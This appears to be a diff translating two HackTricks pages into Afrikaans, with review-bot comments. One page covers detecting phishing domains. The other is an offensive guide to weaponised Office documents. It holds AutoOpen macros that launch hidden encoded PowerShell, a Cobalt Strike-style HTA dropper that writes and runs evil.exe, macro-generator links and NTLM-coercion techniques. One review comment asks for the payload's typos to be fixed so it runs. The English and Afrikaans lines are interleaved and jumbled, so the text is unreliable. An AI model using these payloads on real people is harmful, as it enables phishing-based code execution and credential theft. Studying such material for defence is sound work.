**Jy kan 'n kort verduideliking van hierdie tegniek op die ouerbladsy vind. Of lees die oorspronklike navorsing by [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)**
|
||||
|
||||
Byvoorbeeld, 'n 1-bit-wysiging in die domein microsoft.com kan dit omskep in _windnws.com._\
|
||||
**Aanvallers kan soveel moontlike bitflipping-domeine registreer wat verband hou met die slagoffer om legitieme gebruikers na hul infrastruktuur om te lei**.
|
||||
|
||||
For example, a 1 bit modification in the domain microsoft.com can transform it into _windnws.com._\
|
||||
**Attackers may register as many bit-flipping domains as possible related to the victim to redirect legitimate users to their infrastructure**.
|
||||
**Alle moontlike bitflipping-domeinname moet ook gemonitor word.**
|
||||
|
||||
### Basiese kontroles
|
||||
|
||||
**All possible bit-flipping domain names should be also monitored.**
|
||||
Sodra jy 'n lys potensiële verdagte domeinname het, moet jy dit **ondersoek** (veral die poorte HTTP en HTTPS) om te **sien of hulle 'n soortgelyke aanmeldingsvorm gebruik** as een van die slagoffer se domeine.\
|
||||
Jy kan ook poort 3333 ondersoek om te sien of dit oop is en 'n instansie van `gophish` uitvoer.\
|
||||
Dit is ook interessant om te weet **hoe oud elke ontdekte verdagte domein is**, hoe jonger dit is, hoe gevaarliker dit is.\
|
||||
Jy kan ook **skermskote** van die HTTP- en/of HTTPS-verdagte webblad kry om te sien of dit verdag is en in daardie geval **toegang daartoe neem om 'n dieper kyk te neem**.
|
||||
|
||||
### Basic checks
|
||||
### Gevorderde kontroles
|
||||
|
||||
Once you have a list of potential suspicious domain names you should **check** them (mainly the ports HTTP and HTTPS) to **see if they are using some login form similar** to someone of the victim's domain.\
|
||||
You could also check port 3333 to see if it's open and running an instance of `gophish`.\
|
||||
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.\
|
||||
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's suspicious and in that case **access it to take a deeper look**.
|
||||
As jy 'n stap verder wil gaan, sal ek aanbeveel dat jy **hierdie verdagte domeine monitor en gereeld soek na meer** (elke dag? dit neem slegs 'n paar sekondes/minute). Jy moet ook die **oop poorte** van die betrokke IP's **ondersoek** en **soek na instansies van `gophish` of soortgelyke hulpmiddels** (ja, aanvallers maak ook foute) en **monitor die HTTP- en HTTPS-webblaaie van die verdagte domeine en subdomeine** om te sien of hulle enige aanmeldingsvorm van die slagoffer se webblaaie gekopieer het.\
|
||||
Om dit te **outomatiseer**, sal ek aanbeveel om 'n lys van aanmeldingsvorms van die slagoffer se domeine te hê, die verdagte webblaaie te spider en elke aanmeldingsvorm wat binne die verdagte domeine gevind is, te vergelyk met elke aanmeldingsvorm van die slagoffer se domein deur iets soos `ssdeep` te gebruik.\
|
||||
As jy die aanmeldingsvorms van die verdagte domeine gelokaliseer het, kan jy probeer om **rommelgeloofsbriewe te stuur** en **kyk of dit jou na die slagoffer se domein omskakel**.
|
||||
|
||||
### Advanced checks
|
||||
## Domeinname met sleutelwoorde
|
||||
|
||||
If you want to go one step further I would recommend you to **monitor those suspicious domains and search for more** once in a while (every day? it only takes a few seconds/minutes). You should also **check** the open **ports** of the related IPs and **search for instances of `gophish` or similar tools** (yes, attackers also make mistakes) and **monitor the HTTP and HTTPS web pages of the suspicious domains and subdomains** to see if they have copied any login form from the victim's web pages.\
|
||||
In order to **automate this** I would recommend having a list of login forms of the victim's domains, spider the suspicious web pages and comparing each login form found inside the suspicious domains with each login form of the victim's domain using something like `ssdeep`.\
|
||||
If you have located the login forms of the suspicious domains, you can try to **send junk credentials** and **check if it's redirecting you to the victim's domain**.
|
||||
Die ouerbladsy noem ook 'n tegniek vir die variasie van domeinname wat bestaan uit die plaas van die **slagoffer se domeinnaam binne 'n groter domein** (bv. paypal-financial.com vir paypal.com).
|
||||
|
||||
## Domain names using keywords
|
||||
### Sertifikaattransparansie
|
||||
|
||||
The parent page also mentions a domain name variation technique that consists of putting the **victim's domain name inside a bigger domain** (e.g. paypal-financial.com for paypal.com).
|
||||
Dit is nie moontlik om die vorige "Brute-Force" benadering te gebruik nie, maar dit is eintlik **moontlik om sulke phising-pogings te ontbloot** danksy sertifikaattransparansie. Telkens wanneer 'n sertifikaat deur 'n CA uitgereik word, word die besonderhede openbaar gemaak. Dit beteken dat deur die sertifikaattransparansie te lees of selfs te monitor, dit **moontlik is om domeine te vind wat 'n sleutelwoord binne hul naam gebruik**. Byvoorbeeld, as 'n aanvaller 'n sertifikaat genereer vir [https://paypal-financial.com](https://paypal-financial.com), is dit moontlik om die sleutelwoord "paypal" in die sertifikaat te vind en te weet dat 'n verdagte e-pos gebruik word.
|
||||
|
||||
### Certificate Transparency
|
||||
|
||||
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover such phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that by reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside its name** For example, if an attacker generates a certificate of [https://paypal-financial.com](https://paypal-financial.com), seeing the certificate it's possible to find the keyword "paypal" and know that suspicious email is being used.
|
||||
|
||||
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggests that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
|
||||
Die pos [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) stel voor dat jy Censys kan gebruik om te soek na sertifikate wat 'n spesifieke sleutelwoord affekteer en te filter volgens datum (slegs "nuwe" sertifikate) en volgens die CA-uitreiker "Let's Encrypt":
|
||||
|
||||
![https://0xpatrik.com/content/images/2018/07/cert_listing.png](<../../.gitbook/assets/image (390).png>)
|
||||
|
||||
However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you wish.
|
||||
Jy kan egter "dieselfde" doen deur die gratis webwerf [**crt.sh**](https://crt.sh) te gebruik. Jy kan **soek na die sleutelwoord** en die resultate **filter** volgens datum en CA as jy wil.
|
||||
|
||||
![](<../../.gitbook/assets/image (391).png>)
|
||||
|
||||
Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domains (note that a suspicious domain can be a false positive).
|
||||
Met hierdie laaste opsie kan jy selfs die veld "Matching Identities" gebruik om te sien of enige identiteit van die werklike domein ooreenstem met enige van die verdagte domeine (let daarop dat 'n verdagte domein 'n vals positief kan wees).
|
||||
|
||||
**Another alternative** is the fantastic project called [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream provides a real-time stream of newly generated certificates which you can use to detect specified keywords in (near) real-time. In fact, there is a project called [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) that does just that.
|
||||
**'n Ander alternatief** is die fantastiese projek genaamd [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream bied 'n stroom van nuut gegenereerde sertifikate in werklike tyd wat jy kan gebruik om gespesifiseerde sleutelwoorde in (byna) werklike tyd op te spoor. In werklikheid is daar 'n projek genaamd [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) wat presies dit doen.
|
||||
### **Nuwe domeine**
|
||||
|
||||
### **New domains**
|
||||
|
||||
**One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually use one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain.
|
||||
**Een laaste alternatief** is om 'n lys van **nuut geregistreerde domeine** vir sommige TLD's ([Whoxy](https://www.whoxy.com/newly-registered-domains/) bied so 'n diens) te versamel en **die sleutelwoorde in hierdie domeine te ondersoek**. Tog gebruik lang domeine gewoonlik een of meer subdomeine, dus sal die sleutelwoord nie binne die FLD verskyn nie en sal jy nie die phising subdomein kan vind nie.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
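Review bot: the Afrikaans body text spells the key term `phising` where the English lines being replaced say `phishing`: `Om 'n phising-poging op te spoor`, `'n lys van die mees waarskynlike phisingname` and `die phising subdomein`. Only the removed heading `# Detecting Phising` carried that typo, and the new heading `# Op die spoor van Phishing` already uses the correct spelling, so fix the three body occurrences rather than propagate the typo. Two smaller wording points in the same hunk: `in werklike tyd` for "real-time" reads literally (the usual term is `intyds`), and the removed-then-re-added bit-flipping paragraph (`Byvoorbeeld, 'n 1-bit-wysiging in die domein microsoft.com ...`) now sits above the `### Basiese kontroles` heading while the English `**All possible bit-flipping domain names should be also monitored.**` line it replaces sat below it; check that `**Alle moontlike bitflipping-domeinname moet ook gemonitor word.**` ends up under the Bitflipping section, not under Basic checks.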
@ -1,65 +1,60 @@
|
|||
# Phishing Files & Documents
|
||||
# Phishing Lêers & Dokumente
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
## Office Documents
|
||||
## Kantoor Dokumente
|
||||
|
||||
Microsoft Word performs file data validation before opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
|
||||
Microsoft Word voer data-validering uit voordat 'n lêer geopen word. Data-validering word uitgevoer in die vorm van datastruktuur-identifikasie, teen die OfficeOpenXML-standaard. As enige fout tydens die identifikasie van die datastruktuur voorkom, sal die geanaliseerde lêer nie geopen word nie.
|
||||
|
||||
Usually, Word files containing macros use the `.docm` extension. However, it's possible to rename the file by changing the file extension and still keep their macro executing capabilities.\
|
||||
For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.\
|
||||
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).
|
||||
|
||||
You can use the following command to check which extensions are going to be executed by some Office programs:
|
||||
Gewoonlik gebruik Word-lêers wat makros bevat die `.docm`-uitbreiding. Dit is egter moontlik om die lêer te hernoem deur die lêeruitbreiding te verander en steeds hul makro-uitvoeringsvermoë te behou.\
|
||||
Byvoorbeeld, 'n RTF-lêer ondersteun nie makros, volgens ontwerp nie, maar 'n DOCM-lêer wat na RTF hernoem word, sal deur Microsoft Word hanteer word en in staat wees om makros uit te voer.\
|
||||
Dieselfde interne en meganismes geld vir alle sagteware van die Microsoft Office Suite (Excel, PowerPoint ens.).
|
||||
|
||||
Jy kan die volgende bevel gebruik om te kyk watter uitbreidings deur sommige Office-programme uitgevoer gaan word:
|
||||
```bash
|
||||
assoc | findstr /i "word excel powerp"
|
||||
```
|
||||
### Eksterne Beeld Laai
|
||||
|
||||
DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.
|
||||
|
||||
### External Image Load
|
||||
|
||||
Go to: _Insert --> Quick Parts --> Field_\
|
||||
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\<ip>/whatever
|
||||
Gaan na: _Invoeg --> Vinnige Dele --> Veld_\
|
||||
_**Kategorieë**: Skakels en Verwysings, **Veldname**: includePicture, en **Lêernaam of URL**:_ http://\<ip>/whatever
|
||||
|
||||
![](<../../.gitbook/assets/image (316).png>)
|
||||
|
||||
### Macros Backdoor
|
||||
### Agterdeur vir Makro's
|
||||
|
||||
It's possible to use macros to run arbitrary code from the document.
|
||||
Dit is moontlik om makro's te gebruik om willekeurige kode vanuit die dokument uit te voer.
|
||||
|
||||
#### Autoload functions
|
||||
#### Outomatiese Laai Funksies
|
||||
|
||||
The more common they are, the more probable the AV will detect them.
|
||||
Hoe algemener hulle is, hoe waarskynlik sal die AV dit opspoor.
|
||||
|
||||
* AutoOpen()
|
||||
* Document\_Open()
|
||||
|
||||
#### Macros Code Examples
|
||||
|
||||
#### Voorbeelde van Makro Kode
|
||||
```vba
|
||||
Sub AutoOpen()
|
||||
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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")
|
||||
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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")
|
||||
End Sub
|
||||
```
|
||||
|
||||
```vba
|
||||
Sub AutoOpen()
|
||||
|
||||
Dim Shell As Object
|
||||
Set Shell = CreateObject("wscript.shell")
|
||||
Shell.Run "calc"
|
||||
Dim Shell As Object
|
||||
Set Shell = CreateObject("wscript.shell")
|
||||
Shell.Run "calc"
|
||||
|
||||
End Sub
|
||||
```
|
||||
|
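Review bot: one sentence is dropped instead of translated. The removed line `DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can "execute" macros as well.` has no Afrikaans counterpart: the added `### Eksterne Beeld Laai` heading follows the `assoc | findstr /i "word excel powerp"` block directly. Restore it, for example `DOCX-lêers wat na 'n afgeleë sjabloon verwys (Lêer – Opsies – Byvoegings – Bestuur: Sjablone – Gaan) wat makro's bevat, kan ook makro's "uitvoer".` Two style points: the second VBA block removes and re-adds `Dim Shell As Object`, `Set Shell = CreateObject("wscript.shell")` and `Shell.Run "calc"` with identical text, so the only change is whitespace; keep the original indentation inside code fences so translation diffs do not touch code. And Afrikaans writes compound nouns closed, so the new headings should read `## Kantoordokumente`, `### Eksterne beeldlaai`, `#### Outolaai-funksies` and `#### Voorbeelde van makrokode` rather than the spaced forms.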
@ -68,8 +63,8 @@ End Sub
|
|||
Dim author As String
|
||||
author = oWB.BuiltinDocumentProperties("Author")
|
||||
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
|
||||
.StdIn.WriteLine author
|
||||
.StdIn.WriteBlackLines 1
|
||||
.StdIn.WriteLine author
|
||||
.StdIn.WriteBlackLines 1
|
||||
```
|
||||
|
||||
```vba
|
||||
|
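Review bot: this hunk changes nothing but whitespace, since the removed and added `.StdIn.WriteLine author` / `.StdIn.WriteBlackLines 1` lines are textually identical; inside the `With objWshell1.Exec(...)` block that indentation was meaningful for readability and should be kept. While these lines are being touched, `WriteBlackLines` is a pre-existing typo for the `TextStream.WriteBlankLines` method and `-Windowsstyle` on the context line should be `-WindowStyle`; both are worth correcting in the same pass so the snippet actually runs.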
@ -77,88 +72,85 @@ Dim proc As Object
|
|||
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
|
||||
proc.Create "powershell <beacon line generated>
|
||||
```
|
||||
#### Verwyder handmatig metadata
|
||||
|
||||
#### Manually remove metadata
|
||||
Gaan na **Lêer > Inligting > Inspekteer Dokument > Inspekteer Dokument**, wat die Dokument Inspekteerder sal oopmaak. Klik op **Inspekteer** en dan **Verwyder Alles** langs **Dokumenteienskappe en Persoonlike Inligting**.
|
||||
|
||||
Fo to **File > Info > Inspect Document > Inspect Document**, which will bring up the Document Inspector. Click **Inspect** and then **Remove All** next to **Document Properties and Personal Information**.
|
||||
#### Dokumentuitbreiding
|
||||
|
||||
#### Doc Extension
|
||||
Wanneer jy klaar is, kies die **Stoor as tipe**-keuselys, verander die formaat van **`.docx`** na **Word 97-2003 `.doc`**.\
|
||||
Doen dit omdat jy **nie makro's binne 'n `.docx` kan stoor nie** en daar is 'n **stigma** **rondom** die makro-geaktiveerde **`.docm`**-uitbreiding (bv. die duimnaelsimbool het 'n groot `!` en sommige web-/e-poshekke blokkeer dit heeltemal). Daarom is hierdie **oudmodiese `.doc`-uitbreiding die beste kompromie**.
|
||||
|
||||
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
|
||||
Do this because you **can't save macro's inside a `.docx`** and there's a **stigma** **around** the macro-enabled **`.docm`** extension (e.g. the thumbnail icon has a huge `!` and some web/email gateway block them entirely). Therefore, this **legacy `.doc` extension is the best compromise**.
|
||||
|
||||
#### Malicious Macros Generators
|
||||
#### Kwaadwillige Makro-Generator
|
||||
|
||||
* MacOS
|
||||
* [**macphish**](https://github.com/cldrn/macphish)
|
||||
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
|
||||
* [**macphish**](https://github.com/cldrn/macphish)
|
||||
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
|
||||
|
||||
## HTA Files
|
||||
## HTA-lêers
|
||||
|
||||
An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model.
|
||||
|
||||
An HTA is executed using **`mshta.exe`**, which is typically **installed** along with **Internet Explorer**, making **`mshta` dependant on IE**. So if it has been uninstalled, HTAs will be unable to execute.
|
||||
'n HTA is 'n Windows-program wat **HTML en skripsietale (soos VBScript en JScript)** kombineer. Dit genereer die gebruikerskoppelvlak en voer uit as 'n "volledig vertroude" toepassing, sonder die beperkings van 'n blaaier se sekuriteitsmodel.
|
||||
|
||||
'n HTA word uitgevoer met behulp van **`mshta.exe`**, wat tipies **geïnstalleer** word saam met **Internet Explorer**, wat **`mshta` afhanklik maak van IE**. As dit egter gedeïnstalleer is, sal HTA's nie kan uitvoer nie.
|
||||
```html
|
||||
<--! Basic HTA Execution -->
|
||||
<html>
|
||||
<head>
|
||||
<title>Hello World</title>
|
||||
</head>
|
||||
<body>
|
||||
<h2>Hello World</h2>
|
||||
<p>This is an HTA...</p>
|
||||
</body>
|
||||
<head>
|
||||
<title>Hello World</title>
|
||||
</head>
|
||||
<body>
|
||||
<h2>Hello World</h2>
|
||||
<p>This is an HTA...</p>
|
||||
</body>
|
||||
|
||||
<script language="VBScript">
|
||||
Function Pwn()
|
||||
Set shell = CreateObject("wscript.Shell")
|
||||
shell.run "calc"
|
||||
End Function
|
||||
<script language="VBScript">
|
||||
Function Pwn()
|
||||
Set shell = CreateObject("wscript.Shell")
|
||||
shell.run "calc"
|
||||
End Function
|
||||
|
||||
Pwn
|
||||
</script>
|
||||
Pwn
|
||||
</script>
|
||||
</html>
|
||||
```
|
||||
|
||||
```html
|
||||
<--! Cobal Strike generated HTA without shellcode -->
|
||||
<script language="VBScript">
|
||||
Function var_func()
|
||||
var_shellcode = "<shellcode>"
|
||||
Function var_func()
|
||||
var_shellcode = "<shellcode>"
|
||||
|
||||
Dim var_obj
|
||||
Set var_obj = CreateObject("Scripting.FileSystemObject")
|
||||
Dim var_stream
|
||||
Dim var_tempdir
|
||||
Dim var_tempexe
|
||||
Dim var_basedir
|
||||
Set var_tempdir = var_obj.GetSpecialFolder(2)
|
||||
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
|
||||
var_obj.CreateFolder(var_basedir)
|
||||
var_tempexe = var_basedir & "\" & "evil.exe"
|
||||
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
|
||||
For i = 1 to Len(var_shellcode) Step 2
|
||||
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
|
||||
Next
|
||||
var_stream.Close
|
||||
Dim var_shell
|
||||
Set var_shell = CreateObject("Wscript.Shell")
|
||||
var_shell.run var_tempexe, 0, true
|
||||
var_obj.DeleteFile(var_tempexe)
|
||||
var_obj.DeleteFolder(var_basedir)
|
||||
End Function
|
||||
Dim var_obj
|
||||
Set var_obj = CreateObject("Scripting.FileSystemObject")
|
||||
Dim var_stream
|
||||
Dim var_tempdir
|
||||
Dim var_tempexe
|
||||
Dim var_basedir
|
||||
Set var_tempdir = var_obj.GetSpecialFolder(2)
|
||||
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
|
||||
var_obj.CreateFolder(var_basedir)
|
||||
var_tempexe = var_basedir & "\" & "evil.exe"
|
||||
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
|
||||
For i = 1 to Len(var_shellcode) Step 2
|
||||
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
|
||||
Next
|
||||
var_stream.Close
|
||||
Dim var_shell
|
||||
Set var_shell = CreateObject("Wscript.Shell")
|
||||
var_shell.run var_tempexe, 0, true
|
||||
var_obj.DeleteFile(var_tempexe)
|
||||
var_obj.DeleteFolder(var_basedir)
|
||||
End Function
|
||||
|
||||
var_func
|
||||
self.close
|
||||
var_func
|
||||
self.close
|
||||
</script>
|
||||
```
|
||||
## Dwangmatige NTLM-verifikasie
|
||||
|
||||
## Forcing NTLM Authentication
|
||||
Daar is verskeie maniere om **NTLM-verifikasie "op afstand" af te dwing**, byvoorbeeld deur **onsigbare beelde** by e-posse of HTML in te voeg wat die gebruiker sal toegang (selfs HTTP MitM?). Of stuur die slagoffer die **adres van lêers** wat 'n **verifikasie sal veroorsaak** net vir die **oopmaak van die vouer**.
|
||||
|
||||
There are several ways to **force NTLM authentication "remotely"**, for example, you could add **invisible images** to emails or HTML that the user will access (even HTTP MitM?). Or send the victim the **address of files** that will **trigger** an **authentication** just for **opening the folder.**
|
||||
|
||||
**Check these ideas and more in the following pages:**
|
||||
**Kyk na hierdie idees en meer op die volgende bladsye:**
|
||||
|
||||
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
||||
|
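Review bot: the new heading at L49025, "Dwangmatige NTLM-verifikasie", mistranslates "Forcing NTLM Authentication": "dwangmatig" means compulsive or obsessive, not forced, so the section title no longer says what the technique is; use something like "NTLM-verifikasie afdwing" (or "Afdwing van NTLM-verifikasie") and the same verb in the first sentence of the paragraph at L49033. The only other changed lines in this hunk are the `var_func` / `self.close` pairs inside the VBScript block (L49007 to L49016), whose visible content is identical before and after, so the translation pass has altered whitespace inside a fenced code block; that is harmless here but the tool should be leaving fenced code untouched, since elsewhere in this commit it is rewriting code tokens.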
@ -168,21 +160,21 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
|
|||
[places-to-steal-ntlm-creds.md](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### NTLM Relay
|
||||
### NTLM-oordrag
|
||||
|
||||
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
|
||||
Moenie vergeet dat jy nie net die hasie of die verifikasie kan steel nie, maar ook **NTLM-oordragaanvalle kan uitvoer**:
|
||||
|
||||
* [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
|
||||
* [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
|
||||
* [**NTLM-oordragaanvalle**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
|
||||
* [**AD CS ESC8 (NTLM-oordrag na sertifikate)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
